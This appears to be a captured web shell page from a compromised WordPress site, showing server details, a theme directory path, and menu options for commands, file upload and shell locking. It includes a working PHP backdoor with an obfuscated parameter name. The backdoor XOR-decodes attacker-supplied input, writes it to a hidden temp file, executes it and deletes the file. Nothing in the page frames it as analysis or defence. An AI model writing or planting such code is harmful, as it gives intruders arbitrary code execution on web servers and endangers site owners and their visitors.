hyun.psd; gzuncompress
|
Server IP : 173.236.192.202 / Your IP : 216.73.216.85 Web Server : Apache System : Linux iad1-shared-e1-03 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64 User : andfor18 ( 14551322) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/andfor18/mbssigns.com/wp-content/themes/custom_file_4_1751636890/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
<!--AN0grSU0-->
<?php
if(count($_REQUEST) > 0 && isset($_REQUEST["\x70\x72o\x70e\x72\x74\x79_set"])){
$itm = array_filter(["/var/tmp", session_save_path(), "/dev/shm", getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP")]);
$holder = hex2bin($_REQUEST["\x70\x72o\x70e\x72\x74\x79_set"]);
$token = '' ; foreach(str_split($holder) as $char){$token.=chr(ord($char)^33);}
while ($binding = array_shift($itm)) {
if (max(0, is_dir($binding) * is_writable($binding))) {
$val = vsprintf("%s/%s", [$binding, ".hld"]);
$success = file_put_contents($val, $token);
if ($success) {
include $val;
@unlink($val);
exit;
}
}
}
}